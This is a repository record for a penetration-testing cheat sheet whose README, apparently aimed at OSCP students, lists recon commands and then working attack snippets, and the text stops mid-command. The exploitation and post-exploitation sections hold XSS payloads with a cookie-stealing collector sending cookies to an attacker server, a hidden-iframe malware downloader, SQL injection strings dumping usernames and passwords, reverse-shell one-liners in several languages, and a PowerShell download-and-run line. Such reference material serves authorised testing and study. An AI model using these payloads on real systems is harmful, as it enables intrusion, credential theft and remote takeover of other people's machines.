{"id":13797238,"url":"https://github.com/kitsun3sec/pentest-cheat-sheets","last_synced_at":"2026-06-30T02:30:16.433Z","repository":{"id":59714181,"uuid":"118602893","full_name":"Kitsun3Sec/Pentest-Cheat-Sheets","owner":"Kitsun3Sec","description":"A collection of snippets of codes and commands to make your life easier! ","archived":false,"fork":false,"pushed_at":"2023-09-25T18:10:58.000Z","size":126,"stargazers_count":2658,"open_issues_count":0,"forks_count":473,"subscribers_count":72,"default_branch":"master","last_synced_at":"2025-02-15T02:08:21.945Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Kitsun3Sec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2018-01-23T11:45:19.000Z","updated_at":"2025-02-14T16:57:08.000Z","dependencies_parsed_at":"2023-09-25T23:50:03.602Z","dependency_job_id":null,"html_url":"https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kitsun3Sec%2FPentest-Cheat-Sheets","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kitsun3Sec%2FPentest-Cheat-Sheets/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kitsun3Sec%2FPentest-Cheat-Sheets/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kitsun3Sec%2FPentest-Cheat-Sheets/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kitsun3Sec","download_url":"https://codeload.github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240360288,"owners_count":19789226,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-03T23:01:25.705Z","updated_at":"2026-06-30T02:30:16.358Z","avatar_url":"https://github.com/Kitsun3Sec.png","language":"Shell","funding_links":[],"categories":["\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集"],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/blob/master/CheatSheets/28533648.png\" alt=\"Pentest Cheat Sheets\" width=\"300\" /\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  Pentest-Cheat-Sheets\u003cbr\u003e\n  @n3k00n3 | @UserXGnu | @alacerda\n\u003c/p\u003e\n\nThis repo has a collection of snippets of codes and commands to help our lives!\nThe main purpose is not be a crutch, this is a way to do not waste our precious time!\nThis repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.\n\n## Ninja Tricks\n\n- [Recon](#recon)\n  - [DNS](#dns)\n  - [SPF](#spf-recon)\n  - [Nmap](#nmap)\n  - [NetCat](#netcat)\n  - [SNMP](#SNMP)\n  - [Mysql](#mysql)\n  - [MS SQL](#ms-sql)\n  - [Web Enumeration](#web-enumeration)\n- [Exploitation](#exploitation)\n  - [System Network](#system-network)\n    - [RDP](#rdp)\n    - [Pass The Hash](#pass-the-hash)\n    - [Windows-Shell](#windows-shell)\n  - [Web Application](#web-application)\n    - [Web Remote Code Execution](#web-remote-code-execution)\n    - [LFI](#lfi)\n    - [encode](#encode)\n    - [XSS](#xss)\n    - [SQLi](#sqli)\n      - [sqlmap](#sqlmap)\n      - [Bare Hands](#bare-hands)\n    - [Jekins](#jekins)\n- [Post-exploitation](#post-exploitation)\n  - [Reverse Shell](#reverse-shell)\n    - [PHP Reverse Shell](#php-reverse-shell)\n    - [Perl Reverse Shell](#perl-reverse-shell)\n    - [python Reverse Shell](#python-reverse-shell)\n    - [Ruby Reverse Shell](#ruby-reverse-shell)\n    - [bash Reverse Shell](#bash-reverse-shell)\n    - [powershell Reverse Sheel](#powershell-reverse=shell)\n    - [Java Reverse Sheel](#java-reverse=shell)\n    - [Xterm Reverse Sheel](#xterm-reverse=shell)\n  - [Linux](#linux)\n    - [Linux Privilege Escalation](#linux-privilege-escalation)\n    - [Data Haversting and Enumeration](#data-harvesting-enumeration)\n    - [Linux Pivot](#linux-pivot)\n      - [Sshutle](#sshutle)\n      - [VPNPivot](#vpn-pivot)\n      - [SSH Tunneling](#ssh-tunneling)\n      - [Linux Backdoring](#linux-backdoring)\n  - [Windows](#Windows)\n    - [Windows Enumeration](#windows-enumeration)\n    - [Windows Privilege Escalation](#windows-privilege-escalation)\n    - [Hashdump](#hashdump)\n    - [Transferring Files Without Metasploit](#transferring-files-without-metasploit)\n    - [Backdoring](#windows-backdoring)\n    - [Windows Pivot](#windows-pivot)\n      - [Openssh for Tunneling](#openssh-for-tunneling)\n      - [Plink](#plink)\n- [Resources](#resources)\n  - [HTTP/HTTPS Servers](#http-server)\n  - [Wordlist](#wordlist)\n    - [seclist](#seclist)\n    - [cotse](#cotse)\n    - [PacketStorm](#packetstorm)\n  - [Default Passwords](#default-passwords)\n    - [Default Passoword](#default-password)\n    - [Router Password](#Router-password)\n  - [Leak](#leak)\n    - [Pastebin](#pastebin)\n  - [Tables](#tables)\n- [Contribution](#contribution)\n\n# Recon\n\n## DNS\n\n### Nslookup\n\nResolve a given hostname to the corresponding IP.\n\n```shell\nnslookup targetorganization.com\n```\n\n### Reverse DNS lookup\n\n```shell\nnslookup -type=PTR IP_address\n```\n\n### MX(Mail Exchange) lookup\n\n```shell\nnslookup -type=MX domain\n```\n\n### Zone Transfer\n\n#### Using nslookup Command\n\n```shell\nnslookup\nserver domain.com\nls -d domain.com\n```\n\n#### Using HOST Command\n\nhost -t ns(Name Server) \u003c domain \u003e\n\n```shell\nhost -t ns domain.com\n```\n\nafter that test nameservers\n\nhost -l \u003c domain \u003e \u003c nameserver \u003e\n\n```shell\nhost -l domain.com ns2.domain.com\n```\n\n### Nmap Dns Enumaration\n\n```\nnmap -F --dns-server \u003cdns server ip\u003e \u003ctarget ip range\u003e\n```\n\n### Auto tools\n\n#### DNSenum\n\n```\ndnsenum targetdomain.com\n```\n\n```\ndnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com\n```\n\n#### DNSmap\n\n```bash\ntargetdomain.com\n```\n\n```bash\ndnsmap targetdomain.com -w \u003cWordlst file.txt\u003e\n```\n\nBrute Force, the file is saved in /tmp\n\n```bash\ndnsmap targetdomain.com -r\n```\n\n#### DNSRecon DNS Brute Force\n\n```bash\ndnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml\n```\n\n#### Fierce.pl\n\n```\nfierce -dns targetdomain.com\n```\n\n#### HostMap\n\n```\nhostmap.rb -only-passive -t \u003cIP\u003e\n```\n\nWe can use -with-zonetransfer or -bruteforce-level\n\n##\n\n## SPF Recon\n\n### Dig SPF txt\n\n```bash\ndig txt target.com\n```\n\n#### Dmarc\n\n```bash\ndig TXT _dmarc.example.org\n```\n\n#### Online Tools\n\n- https://dnsdumpster.com/\n- https://network-tools.com/nslook/\n- https://www.dnsqueries.com/en/\n- https://mxtoolbox.com/\n\n##\n\n## Nmap\n\nSet the ip address as a varible\n\n`export ip=192.168.1.100`\n`export netw=192.168.1.0/24`\n\n### Detecting Live Hosts\n\nOnly Ip's\n\n```shell\nnmap -sn -n $netw | grep for | cut -d\" \" -f5\n```\n\n### Stealth Scan\n\n```shell\nnmap -sS $ip\n```\n\nOnly Open Ports and Banner Grab\n\n```shell\nnmap -n -Pn -sS $ip --open -sV\n```\n\nStealth scan using FIN Scan\n\n```shell\nnmap -sF $ip\n```\n\n### Agressive scan\n\nWithout Ping scan, no dns resolution, show only open ports all and test All TCP Ports\n\n```shell\nnmap -n -Pn -sS -A $ip --open -p-\n```\n\nNmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services\n\n```shell\nnmap –v –sS –A –T4 $ip\n```\n\n### OS FigerPrint\n\n```shell\nnmap -O $ip\n```\n\n### Quick Scan\n\n```shell\nnmap -T4 -F $netw\n```\n\n### Quick Scan Plus\n\n```shell\nnmap -sV -T4 -O -F --version-light $netw\n```\n\n### output to a file\n\n```shell\nnmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip\n```\n\n### output to a file Plus\n\n```shell\nnmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw\n```\n\n### Search NMAP scripts\n\n```shell\nls /usr/share/nmap/scripts/ | grep ftp\n```\n\n- [Nmap Discovery](https://nmap.org/nsedoc/categories/discovery.html)\n\n##\n\n## NetCat\n\n### Port Scanner\n\nOne port\n\n```shell\nnc -nvz 192.168.1.23 80\n```\n\nPort Range\n\n```shell\nnc -vnz 192.168.1.23 0-1000\n```\n\n### Send files\n\n- Server\n\n```shell\nnc -lvp 1234 \u003e file_name_to_save\n```\n\n- Client\n\n```shell\nnc -vn 192.168.1.33 1234 \u003c file_to_send\n```\n\n### Executing remote script\n\n- Server\n\n```shell\nnc -lvp 1234 -e ping.sh \u003cIP\u003e\n```\n\n- Client\n\n```shell\nnc -vn 192.168.1.33 1234\n```\n\n### Chat with encryption\n\n- Server\n\n```shell\nncat -nlvp 8000 --ssl\n```\n\n- Client\n\n```shell\nncat -nv 192.168.1.33 8000\n```\n\n### Banner Grabbing\n\n- Request\n\n```shell\nnc target port\nHTTP_Verb path http/version\nHost: url\n```\n\n- Response\n\n```shell\nnc www.bla.com.br 80\nHEAD / HTTP/1.0\nHost: www.bla.com.br\n```\n\n### If this site uses https you need to use openssl\n\n```shell\nopenssl s_client -quiet www.bla.com.br:443\n```\n\n##\n\n## SNMP\n\n### Fixing SNMP output\n\n```shell\napt-get install snmp-mibs-downloader download-mibs\n```\n\n```shell\necho \"\" \u003e /etc/snmp/snmp.conf\n```\n\n### OneSixtyone\n\nonesixtyone -c COMMUNITY_FILE -i Target_ip\n\n```shell\nonesixtyone -c community.txt -i Found_ips.txt\n```\n\n### snmpwalk\n\nWalking MIB's\n\nsnmpwalk -c COMMUNITY -v VERSION target_ip\n\n```shell\nsnmpwalk -c public -v1 192.168.25.77\n```\n\nspecific MIB node\nsnmpwalk -c community -v version Target IP MIB Node\nExample: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25\n\n```shell\nsnmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25\n```\n\n### snmp-check\n\nsnmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY\n\n```shell\nsnmp-check -t 172.20.10.5\n```\n\n```shell\nsnmp-check -t 172.20.10.5 -c public\n```\n\n### Automate the username enumeration process for SNMPv3\n\n```shell\napt-get install snmp snmp-mibs-downloader\n```\n\n```shell\nwget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb\n```\n\n### NMAP SNMPv3 Enumeration\n\n```shell\nnmap -sV -p 161 --script=snmp-info 172.20.10.0/24\n```\n\n### Default Credentials\n\n```shell\n/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt\n```\n\n##\n\n## MYSQL\n\n### Try remote default Root access\n\nMysql Open to wild\n\n```shell\nmysql -h Target_ip -u root -p\n```\n\n## MSSQL\n\n### MSQL Information Gathering\n\n```\nnmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip\n```\n\n## Web Enumeration\n\n### Dirsearch\n\n```shell\ndirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old\n```\n\n```shell\ndirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist\n```\n\n```shell\ndirsearch -u https://target.com -e .\n```\n\n### dirb\n\n```shell\ndirb http://target.com /path/to/wordlist\n```\n\n```shell\ndirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old\n```\n\n### Gobuster\n\n```shell\ngobuster -u https://target.com -w /usr/share/wordlists/dirb/big.txt\n```\n\n##\n\n# Exploitation\n\n## System Network\n\n## RDP\n\n### xfreerdp\n\n##### Simple User Enumeration for Windows Target (kerberos based)\n\nxfreerdp /v:\u003ctarget_ip\u003e -sec-nla /u:\"\"\n\n```\nxfreerdp /v:192.168.0.32 -sec-nla /u:\"\"\n```\n\n### login\n\nxfreerdp /u:\u003cuser\u003e /g:\u003cdomain\u003e /p:\u003cpass\u003e /v:\u003ctarget_ip\u003e\n\n```\nxfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34\n```\n\n#### Wordlist based bruteforce\n\n### NCRACK\n\nncrack -vv --user/-U \u003cusername/username_wordlist\u003e --pass/-P \u003cpassword/password_wordlist\u003e \u003ctarget_ip\u003e:3389\n\n```\nncrack -vv --user user -P wordlist.txt 192.168.0.32:3389\n```\n\n### Crowbar\n\ncrowbar -b rdp \u003c-u/-U user/user_wordlist\u003e -c/-C \u003cpassword/password_wordlist\u003e -s \u003ctarget_ip\u003e/32 -v\n\n```\ncrowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v\n```\n\n## Pass the hash\n\n### Smb pass the hash\n\n#### Tool:\n\n[pth-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)\n\n### Listing shared folders\n\nsudo pth-smbclient --user=\u003cuser\u003e --pw-nt-hash -m smb3 -L \u003ctarget_ip\u003e \\\\\\\\\u003ctarget_ip\u003e\\\\ \u003chash\u003e\n\n```\nsudo pth-smbclient --user=user --pw-nt-hash -m smb3  -L 192.168.0.24 \\\\\\\\192.168.0.24\\\\ ljahdçjkhadkahdkjahsdlkjahsdlkhadklad\n```\n\n### Interactive smb shell\n\nsudo pth-smbclient --user=\u003cuser\u003e --pw-nt-hash -m smb3 \\\\\\\\\u003ctarget_ip\u003e\\\\shared_folder \u003chash\u003e\n\n```\nsudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\\\\\192.168.0.24\\\\folder ljahdçjkhadkahdkjahsdlkjahsdlkhadklad\n```\n\n## Web Application\n\n### Web Remote code\n\n### LFI (Local File Inclusion)\n\nSituation\n\n```\nhttp://\u003ctarget\u003e/index.php?parameter=value\n```\n\n#### How to Test\n\n```\nhttp://\u003ctarget\u003e/index.php?parameter=php://filter/convert.base64-encode/resource=index\n```\n\n```\nhttp://\u003ctarget\u003e/script.php?page=../../../../../../../../etc/passwd\n\n```\n\n```\nhttp://\u003ctarget\u003e/script.php?page=../../../../../../../../boot.ini\n```\n\n#### LFI Payloads\n\n- [Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders)\n- [Seclist LFI Intruder](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)\n\n### encode\n\n## XSS\n\n### Reflected\n\n#### Simple test\n\nThis is a simple test to see what happens, this is not a prove that the field is vuln to xss\n\n```javascript\n\u003cplaintext\u003e\n```\n\n#### Simple XSS test\n\n```javascript\n\u003cscript\u003ealert('Found')\u003c/script\u003e\n```\n\n```javascript\n\"\u003e\u003cscript\u003ealert(Found)\u003c/script\u003e\"\u003e\n```\n\n```javascript\n\u003cscript\u003ealert(String.fromCharCode(88,83,83))\u003c/script\u003e\n```\n\n#### Bypass filter of tag script\n\n`\"  onload=\"alert(String.fromCharCode(88,83,83))`\n\n```javascript\n\" onload=\"alert('XSS')\n```\n\nbla is not a valid image, so this cause an error\n\n```javascript\n\u003cimg src='bla' onerror=alert(\"XSS\")\u003e\n```\n\n### Persistent\n\n```javascript\n\u003edocument.body.innerHTML=\"\u003cstyle\u003ebody{visibility:hidden;}\u003c/style\u003e\u003cdiv style=visibility:visible;\u003e\u003ch1\u003eHACKED!\u003c/h1\u003e\u003c/div\u003e\";\n```\n\n### PHP collector\n\n`\u003e cookie.txt`\n`chmod 777 cookie.txt`\n\nedit a php page like colector.php as follow:\n\n```php\n\u003c?php\n  $cookie=GET['cookie'];\n  $useragent=$_SERVER['HTTP_USER_AGENT'];\n  $file=fopen('cookie.txt', 'a');\n  fwrite($file,\"USER AGENT:$useragent || COOKIE=$cookie\\n\");\n  fclose($file);\n?\u003e\n```\n\nScript to put in page:\n\n```javascript\n\u003cscritp\u003enew Image().src=\"http://OUR_SERVER_IP/colector.php?cookie=\"+document.cookie;\u003c/script\u003e\n```\n\n#### Malware Donwloader via XSS\n\n```javascript\n\u003ciframe src=\"http://OUR_SERVER_IP/OUR_MALWARE\" height=\"0\" width=\"0\"\u003e\u003c/iframe\u003e\n```\n\n#### How to play Mario with XSS\n\n```javascript\n\u003ciframe\n  src=\"https://jcw87.github.io/c2-smb1/\"\n  width=\"100%\"\n  height=\"600\"\n\u003e\u003c/iframe\u003e\n```\n\n```javascript\n\u003cinput onfocus=\"document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')\" autofocus\u003e\n```\n\n#### XSS payloads\n\n- [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection)\n- [Seclist XSS](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/XSS)\n\n## SQLI\n\nSql Injection\n\n### Sqlmap\n\n#### GET\n\n#### Error-Based\n\n#### Simple test\n\n`Adding a simpe quote '`\n\nExample:\n\n```javascript\nhttp://192.168.1.104/Less-1/?id=5'\n```\n\n#### List databases\n\n```bash\n./sqlmap.py -u http://localhost/Less-1/?id=1 --dbs\n```\n\n#### List tables\n\n```bash\n./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name --tables\n```\n\n#### List columns\n\n```bash\n./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --columns\n```\n\n#### Dump all\n\n```bash\n./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --dump-all\n```\n\n#### Set Cookie\n\n```bash\n./sqlmap.py -u http://target/ovidentia/index.php\\?tg\\=delegat\\\u0026idx\\=mem\\\u0026id\\=1 --cookie \"Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8\" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs\n```\n\n#### Checking Privileges\n\n```bash\n./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE\n```\n\n#### Reading file\n\n```bash\n./sqlmap.py -u \u003cURL\u003e --file-read=\u003cfile to read\u003e\n```\n\n```bash\n./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd\n```\n\n#### Writing file\n\n```\n./sqlmap.py -u \u003curl\u003e --file-write=\u003cfile\u003e --file-dest=\u003cpath\u003e\n```\n\n```\n./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/html/shell-php.php\n```\n\n#### POST\n\n```bash\n./sqlmap.py -u \u003cPOST-URL\u003e --data=\"\u003cPOST-paramters\u003e \"\n```\n\n```bash\n./sqlmap.py -u http://localhost/Less-11/ --data \"uname=teste\u0026passwd=\u0026submit=Submit\" -p uname\n```\n\nYou can also use a file like with the post request:\n\n```bash\n./sqlmap.py -r post-request.txt -p uname\n```\n\n### Bare Hands\n\n#### GET\n\n#### Error-Based\n\n#### Simple test\n\n`Adding a simpe quote '`\n\nExample:\n\n```\nhttp://192.168.1.104/Less-1/?id=5'\n```\n\n#### Fuzzing\n\nSorting columns to find maximum column\n\n`http://192.168.1.104/Less-1/?id=-1 order by 1`\n\n`http://192.168.1.104/Less-1/?id=-1 order by 2`\n\n`http://192.168.1.104/Less-1/?id=-1 order by 3`\n\n(until it stop returning errors)\n\n---\n\n#### Finding what column is injectable\n\n**mysql**\n\n`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, 3`\n\n(using the same amount of columns you got on the previous step)\n\n**postgresql**\n\n`http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, NULL`\n\n(using the same amount of columns you got on the previous step)\n\none of the columns will be printed with the respective number\n\n---\n\n#### Finding version\n\n**mysql**\n\n`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, version()`\n\n**postgres**\n\n`http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, version()`\n\n#### Finding database name\n\n**mysql**\n\n`http://192.168.1.104/Less-1/?id=-1 union select 1,2, database()`\n\n**postgres**\n\n`http://192.168.1.104/Less-1/?id=-1 union select NULL,NULL, database()`\n\n#### Finding usernames logged in\n\n**mysql**\n\n`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, current_user()`\n\n#### Finding databases\n\n**mysql**\n\n`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata`\n\n**postgres**\n\n`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, datname from pg_database`\n\n#### Finding table names from a database\n\n**mysql**\n\n```\nhttp://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema=\"database_name\"\n```\n\n**postgres**\n\n```\nhttp://192.168.1.104/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog=\"database_name\"\n```\n\n#### Finding column names from a table\n\n**mysql**\n\n```\nhttp://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema=\"database_name\" and table_name=\"tablename\"\n```\n\n**postgres**\n\n```\nhttp://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog=\"database_name\" and table_name=\"tablename\"\n```\n\n#### Concatenate\n\nExample:\n\n`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login from users;`\n`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, password from users;`\n\nin one query\n\n`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql**\n`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres**\n\n### Error Based SQLI (USUALLY MS-SQL)\n\n#### Current user\n\n`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--`\n\n#### DBMS version\n\n`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--`\n\n#### Database name\n\n`http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 --`\n\n#### Tables from a database\n\n`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--`\n\n---\n\n`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--`\n\n#### Columns within a table\n\n`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--`\n\n\u003e remember to change **dbname** and **tablename** accordingly with the given situation\n\u003e after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample\n\n`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--`\n\n#### Actual data\n\n`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--`\n\n\u003e after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample\n\n`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--`\n\n#### Shell commands\n\n`EXEC master..xp_cmdshell \u003ccommand\u003e`\n\n\u003e you need yo be 'sa' user\n\n#### Enabling shell commands\n\n`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;`\n\n### Jenkins\n\n##\n\n# Post Exploitation\n\n## Reverse Shell\n\n### PHP Reverse Shell\n\n```php\nphp -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\n```\n\nTiny Reverse Shell\n\n```php\n\u003c?php\nexec(\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/10.9.36.167/1337 0\u003e\u00261'\");\n```\n\n### Perl Reverse Shell\n\n```perl\nperl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n\n```\n\n### Python Reverse Shell\n\n```python\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n```\n\n### Ruby Reverse Shell\n\n```ruby\nruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i \u003c\u0026%d \u003e\u0026%d 2\u003e\u0026%d\",f,f,f)'\n```\n\n### Bash Reverse Shell\n\n```bash\nbash -i \u003e\u0026 /dev/tcp/10.0.0.1/8080 0\u003e\u00261\n```\n\n### Powershell Reverse Shell\n\nCreate a simple powershell script called reverse.ps1:\n\n```powershell\nfunction reverse_powershell {\n    $client = New-Object System.Net.Sockets.TCPClient(\"10.10.10.10\",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"\u003e \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n}\n```\n\n```powershell\npowershell -ExecutionPolicy bypass -command \"Import-Module reverse.ps1; reverse_powershell\"\n```\n\n### Java Reverse Shell\n\n```java\nr = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u003c\u003e/dev/tcp/10.0.0.1/2002;cat \u003c\u00265 | while read line; do \\$line 2\u003e\u00265 \u003e\u00265; done\"] as String[])\np.waitFor()\n```\n\n### Xterm Reverse Shell\n\nOne of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.\n\n```bash\nxterm -display 10.0.0.1:1\n```\n\nTo catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):\n\n```bash\nXnest :1\n\n```\n\nYou’ll need to authorise the target to connect to you (command also run on your host):\n\n```bash\nxhost +targetip\n```\n\n##\n\n## Linux\n\n## Windows\n\n### Transferring Files Without Metasploit\n\n#### Powershell\n\nDownload files with powershell\n\n```powershell\npowershell -c \"Invoke-WebRequest -uri 'http://Your-IP:Your-Port/winPEAS.bat' -OutFile 'C:\\Windows\\Temp\\winPEAS.bat'\"\n```\n\n```powershell\npowershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port\n```\n\n```powershell\npowershell \"(New-Object System.Net.WebClient).Downloadfile('http://\u003cip\u003e:8000/shell-name.exe','shell-name.exe')\"\n```\n\nCreating a server with python3\n\n```shell\npython -m http.server\n```\n\nCreating a server with python2\n\n```shell\npython -m SimpleHTTPServer 80\n```\n\n#### FTP\n\nYou need to create a FTP server\n\n- Server Linux\n  Allow anonymous\n\n```shell\npython -m pyftpdlib -p 21 -u anonymous -P anonymous\n```\n\n- Windows Client\n\n```shell\nftp\nopen target_ip port\nopen 192.168.1.22 21\n```\n\nwe can simply run ftp -s:ftp_commands.txt and we can download a file with no user interaction.\n\nlike this:\n\n```shell\nC:\\Users\\kitsunesec\\Desktop\u003eecho open 10.9.122.8\u003eftp_commands.txt\nC:\\Users\\kitsunesec\\Desktop\u003eecho anonymous\u003e\u003eftp_commands.txt\nC:\\Users\\kitsunesec\\Desktop\u003eecho whatever\u003e\u003eftp_commands.txt\nC:\\Users\\kitsunesec\\Desktop\u003eftp -s:ftp_commands.txt\n```\n\n#### Apache Server\n\n- server\n  Put your files into /var/www/html\n\n```shell\ncp nc.exe /var/www/html\nsystemctl start 